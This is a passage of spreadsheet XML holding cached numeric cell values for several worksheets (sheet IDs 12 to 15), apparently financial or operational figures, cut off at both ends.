          <cell r="T81">
            <v>31.943287037037</v>
          </cell>
          <cell r="U81">
            <v>43.2319023569024</v>
          </cell>
          <cell r="V81">
            <v>36.351395598497</v>
          </cell>
          <cell r="W81">
            <v>281.749338744157</v>
          </cell>
          <cell r="X81">
            <v>284.063600697047</v>
          </cell>
          <cell r="Y81">
            <v>275.998550337295</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="12">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5609.357</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>44711.4650000504</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>4687</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>5257.32</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>49023.2749999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>204.46</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>6402.03</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>926</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>724</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>12715.47</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>2211</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>3252.51</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>22750.493</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>1550</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>343</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>4845.80199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>444.03</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>193</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3683.86600000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>2349.357</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>1.2e-5</v>
          </cell>
          <cell r="S72">
            <v>0.000353</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.2509633911368e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>1e-5</v>
          </cell>
          <cell r="Y72">
            <v>9.12181303116147e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>1e-6</v>
          </cell>
          <cell r="R73">
            <v>1.2e-5</v>
          </cell>
          <cell r="S73">
            <v>5781.730353</v>
          </cell>
          <cell r="T73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V73">
            <v>69.6258472182081</v>
          </cell>
          <cell r="W73">
            <v>1e-5</v>
          </cell>
          <cell r="X73">
            <v>1e-5</v>
          </cell>
          <cell r="Y73">
            <v>239.299857573279</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>1e-11</v>
          </cell>
          <cell r="R76">
            <v>1.1e-10</v>
          </cell>
          <cell r="S76">
            <v>3.41e-9</v>
          </cell>
          <cell r="T76">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U76">
            <v>3.81944444444445e-11</v>
          </cell>
          <cell r="V76">
            <v>4.10645472061657e-11</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>1e-11</v>
          </cell>
          <cell r="R77">
            <v>1e-11</v>
          </cell>
          <cell r="S77">
            <v>5059.82000000012</v>
          </cell>
          <cell r="T77">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U77">
            <v>3.47222222222222e-12</v>
          </cell>
          <cell r="V77">
            <v>60.9323217726411</v>
          </cell>
          <cell r="W77">
            <v>0</v>
          </cell>
          <cell r="X77">
            <v>0</v>
          </cell>
          <cell r="Y77">
            <v>19.77</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>14.5</v>
          </cell>
          <cell r="R79">
            <v>157.614722222222</v>
          </cell>
          <cell r="S79">
            <v>3795.17361111111</v>
          </cell>
          <cell r="T79">
            <v>60.4166666666667</v>
          </cell>
          <cell r="U79">
            <v>54.7273341049383</v>
          </cell>
          <cell r="V79">
            <v>45.7029577445943</v>
          </cell>
          <cell r="W79">
            <v>106.896551724138</v>
          </cell>
          <cell r="X79">
            <v>100.485536989812</v>
          </cell>
          <cell r="Y79">
            <v>102.186366089972</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>9.91638888888889</v>
          </cell>
          <cell r="R80">
            <v>125.665</v>
          </cell>
          <cell r="S80">
            <v>2730.52083333333</v>
          </cell>
          <cell r="T80">
            <v>41.318287037037</v>
          </cell>
          <cell r="U80">
            <v>43.6336805555556</v>
          </cell>
          <cell r="V80">
            <v>32.8819946210662</v>
          </cell>
          <cell r="W80">
            <v>93.3807669682624</v>
          </cell>
          <cell r="X80">
            <v>84.5661083038236</v>
          </cell>
          <cell r="Y80">
            <v>79.3778964635868</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>8.66638888888889</v>
          </cell>
          <cell r="R81">
            <v>122.798611111111</v>
          </cell>
          <cell r="S81">
            <v>3018.56194444445</v>
          </cell>
          <cell r="T81">
            <v>36.1099537037037</v>
          </cell>
          <cell r="U81">
            <v>42.6384066358025</v>
          </cell>
          <cell r="V81">
            <v>36.3506977895526</v>
          </cell>
          <cell r="W81">
            <v>255.123561652617</v>
          </cell>
          <cell r="X81">
            <v>282.021186450263</v>
          </cell>
          <cell r="Y81">
            <v>275.938617570195</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="13">
        <row r="7">
          <cell r="P7">
            <v>200</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>15340</v>
          </cell>
          <cell r="Q8">
            <v>10593.625</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>10593.625</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>105046.44300005</v>
          </cell>
          <cell r="E19">
            <v>2e-11</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>3158</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>41553.4650000505</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>4202</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4346.811</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>48878.4639999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>46.58</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>6355.45</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>859</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>485</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>13089.47</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>2400</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>2915.071</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>22235.422</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>943</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>475</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>5313.80199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>179</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3504.86600000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>0</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>1.3e-5</v>
          </cell>
          <cell r="S72">
            <v>0.000354</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.2507204610951e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>1e-5</v>
          </cell>
          <cell r="Y72">
            <v>9.12429378531073e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>1e-6</v>
          </cell>
          <cell r="R73">
            <v>1.3e-5</v>
          </cell>
          <cell r="S73">
            <v>5781.730354</v>
          </cell>
          <cell r="T73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V73">
            <v>69.4251963736792</v>
          </cell>
          <cell r="W73">
            <v>1e-5</v>
          </cell>
          <cell r="X73">
            <v>1e-5</v>
          </cell>
          <cell r="Y73">
            <v>239.29985753189</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>1e-11</v>
          </cell>
          <cell r="R76">
            <v>1.2e-10</v>
          </cell>
          <cell r="S76">
            <v>3.42e-9</v>
          </cell>
          <cell r="T76">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U76">
            <v>3.84615384615385e-11</v>
          </cell>
          <cell r="V76">
            <v>4.10662824207493e-11</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>1e-11</v>
          </cell>
          <cell r="R77">
            <v>1e-11</v>
          </cell>
          <cell r="S77">
            <v>5059.82000000012</v>
          </cell>
          <cell r="T77">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U77">
            <v>3.20512820512821e-12</v>
          </cell>
          <cell r="V77">
            <v>60.7567243035557</v>
          </cell>
          <cell r="W77">
            <v>0</v>
          </cell>
          <cell r="X77">
            <v>0</v>
          </cell>
          <cell r="Y77">
            <v>19.77</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>11.5</v>
          </cell>
          <cell r="R79">
            <v>169.114722222222</v>
          </cell>
          <cell r="S79">
            <v>3806.67361111111</v>
          </cell>
          <cell r="T79">
            <v>47.9166666666667</v>
          </cell>
          <cell r="U79">
            <v>54.2034366096866</v>
          </cell>
          <cell r="V79">
            <v>45.7093373092112</v>
          </cell>
          <cell r="W79">
            <v>104.434782608696</v>
          </cell>
          <cell r="X79">
            <v>100.754090336442</v>
          </cell>
          <cell r="Y79">
            <v>102.193158579322</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>9.58305555555556</v>
          </cell>
          <cell r="R80">
            <v>135.248055555556</v>
          </cell>
          <cell r="S80">
            <v>2740.10388888889</v>
          </cell>
          <cell r="T80">
            <v>39.9293981481482</v>
          </cell>
          <cell r="U80">
            <v>43.3487357549858</v>
          </cell>
          <cell r="V80">
            <v>32.9023041413171</v>
          </cell>
          <cell r="W80">
            <v>89.6373807936462</v>
          </cell>
          <cell r="X80">
            <v>84.9254353625951</v>
          </cell>
          <cell r="Y80">
            <v>79.4137772959541</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>8</v>
          </cell>
          <cell r="R81">
            <v>130.798611111111</v>
          </cell>
          <cell r="S81">
            <v>3026.56194444445</v>
          </cell>
          <cell r="T81">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U81">
            <v>41.9226317663818</v>
          </cell>
          <cell r="V81">
            <v>36.3420022147508</v>
          </cell>
          <cell r="W81">
            <v>267.75</v>
          </cell>
          <cell r="X81">
            <v>281.148321741439</v>
          </cell>
          <cell r="Y81">
            <v>275.9169728982</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="14">
        <row r="7">
          <cell r="P7">
            <v>200</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>15340</v>
          </cell>
          <cell r="Q8">
            <v>10593.625</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>11.9</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>10581.725</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>105046.44300005</v>
          </cell>
          <cell r="E19">
            <v>2e-11</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>3517.06</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>38036.4050000505</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>4425</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4006.04</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>49297.4239999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>133.32</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>6222.13</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>840</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>640</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>13289.47</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>3585</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>2412.13</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>23408.292</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>212</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>5101.80199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>198.85</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3306.01600000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>0</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>1.4e-5</v>
          </cell>
          <cell r="S72">
            <v>0.000355</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.25047892720306e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>1e-5</v>
          </cell>
          <cell r="Y72">
            <v>9.12676056338028e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>1e-6</v>
          </cell>
          <cell r="R73">
            <v>1.4e-5</v>
          </cell>
          <cell r="S73">
            <v>5781.730355</v>
          </cell>
          <cell r="T73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V73">
            <v>69.2256986949234</v>
          </cell>
          <cell r="W73">
            <v>1e-5</v>
          </cell>
          <cell r="X73">
            <v>1e-5</v>
          </cell>
          <cell r="Y73">
            <v>239.299857490501</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>1e-11</v>
          </cell>
          <cell r="R76">
            <v>1.3e-10</v>
          </cell>
          <cell r="S76">
            <v>3.43e-9</v>
          </cell>
          <cell r="T76">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U76">
            <v>3.86904761904762e-11</v>
          </cell>
          <cell r="V76">
            <v>4.10680076628353e-11</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>1e-11</v>
          </cell>
          <cell r="R77">
            <v>1e-11</v>
          </cell>
          <cell r="S77">
            <v>5059.82000000012</v>
          </cell>
          <cell r="T77">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U77">
            <v>2.97619047619048e-12</v>
          </cell>
          <cell r="V77">
            <v>60.5821360153271</v>
          </cell>
          <cell r="W77">
            <v>0</v>
          </cell>
          <cell r="X77">
            <v>0</v>
          </cell>
          <cell r="Y77">
            <v>19.77</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>11.4163888888889</v>
          </cell>
          <cell r="R79">
            <v>180.531111111111</v>
          </cell>
          <cell r="S79">
            <v>3818.09</v>
          </cell>
          <cell r="T79">
            <v>47.568287037037</v>
          </cell>
          <cell r="U79">
            <v>53.7294973544973</v>
          </cell>
          <cell r="V79">
            <v>45.7146791187739</v>
          </cell>
          <cell r="W79">
            <v>96.002335823256</v>
          </cell>
          <cell r="X79">
            <v>100.453599871983</v>
          </cell>
          <cell r="Y79">
            <v>102.174647533191</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>9.83305555555556</v>
          </cell>
          <cell r="R80">
            <v>145.081111111111</v>
          </cell>
          <cell r="S80">
            <v>2749.93694444445</v>
          </cell>
          <cell r="T80">
            <v>40.9710648148148</v>
          </cell>
          <cell r="U80">
            <v>43.1789021164021</v>
          </cell>
          <cell r="V80">
            <v>32.9254902352065</v>
          </cell>
          <cell r="W80">
            <v>85.4261419814119</v>
          </cell>
          <cell r="X80">
            <v>84.9593713861212</v>
          </cell>
          <cell r="Y80">
            <v>79.4352759401655</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>9.08305555555556</v>
          </cell>
          <cell r="R81">
            <v>139.881666666667</v>
          </cell>
          <cell r="S81">
            <v>3035.645</v>
          </cell>
          <cell r="T81">
            <v>37.8460648148148</v>
          </cell>
          <cell r="U81">
            <v>41.6314484126984</v>
          </cell>
          <cell r="V81">
            <v>36.3463242337165</v>
          </cell>
          <cell r="W81">
            <v>274.026728646136</v>
          </cell>
          <cell r="X81">
            <v>280.685889263544</v>
          </cell>
          <cell r="Y81">
            <v>275.911317034765</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="15">
        <row r="7">
          <cell r="P7">
            <v>200</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>15340</v>
          </cell>
          <cell r="Q8">
            <v>10593.625</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>131.16</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>10450.565</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>105046.44300005</v>
          </cell>
          <cell r="E19">
            <v>384.86000000002</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>2604.145</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>35817.1200000505</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>3161</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4942.355</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>47516.0689999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>167.7</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>6054.43</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>399</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>618</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>13070.47</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>2762</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>3026.865</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>23143.427</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>326</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>4775.80199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>222.79</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>137</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3391.80600000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>127.145</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>1.5e-5</v>
          </cell>
          <cell r="S72">
            <v>0.000356</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.25023877745941e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>1e-5</v>
          </cell>
          <cell r="Y72">
            <v>9.12921348314607e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>2.880001</v>
          </cell>
          <cell r="R73">
            <v>2.880015</v>
          </cell>
          <cell r="S73">
            <v>5784.610356</v>
          </cell>
          <cell r="T73">
            <v>12.0000041666667</v>
          </cell>
          <cell r="U73">
            <v>0.800004166666666</v>
          </cell>
          <cell r="V73">
            <v>69.0617282234957</v>
          </cell>
          <cell r="W73">
            <v>133.631898044483</v>
          </cell>
          <cell r="X73">
            <v>133.631248448411</v>
          </cell>
          <cell r="Y73">
            <v>239.247248272223</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>1e-11</v>
          </cell>
          <cell r="R76">
            <v>1.4e-10</v>
          </cell>
          <cell r="S76">
            <v>3.44e-9</v>
          </cell>
          <cell r="T76">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U76">
            <v>3.88888888888889e-11</v>
          </cell>
          <cell r="V76">
            <v>4.10697230181471e-11</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>1e-11</v>
          </cell>
          <cell r="R77">
            <v>1e-11</v>
          </cell>
          <cell r="S77">
            <v>5059.82000000012</v>
          </cell>
          <cell r="T77">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U77">
            <v>2.77777777777778e-12</v>
          </cell>
          <cell r="V77">
            <v>60.4085482330482</v>
          </cell>
          <cell r="W77">
            <v>0</v>
          </cell>
          <cell r="X77">
            <v>0</v>
          </cell>
          <cell r="Y77">
            <v>19.77</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>4.58333333333334</v>
          </cell>
          <cell r="R79">
            <v>185.114444444444</v>
          </cell>
          <cell r="S79">
            <v>3822.67333333333</v>
          </cell>
          <cell r="T79">
            <v>19.0972222222222</v>
          </cell>
          <cell r="U79">
            <v>51.4206790123457</v>
          </cell>
          <cell r="V79">
            <v>45.6384113339701</v>
          </cell>
          <cell r="W79">
            <v>93.1636363636363</v>
          </cell>
          <cell r="X79">
            <v>100.273104325852</v>
          </cell>
          <cell r="Y79">
            <v>102.16384345336</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>4.58333333333334</v>
          </cell>
          <cell r="R80">
            <v>149.664444444444</v>
          </cell>
          <cell r="S80">
            <v>2754.52027777778</v>
          </cell>
          <cell r="T80">
            <v>19.0972222222222</v>
          </cell>
          <cell r="U80">
            <v>41.5734567901235</v>
          </cell>
          <cell r="V80">
            <v>32.8858676907567</v>
          </cell>
          <cell r="W80">
            <v>87.0545454545454</v>
          </cell>
          <cell r="X80">
            <v>85.0235341281979</v>
          </cell>
          <cell r="Y80">
            <v>79.4479538834802</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>8</v>
          </cell>
          <cell r="R81">
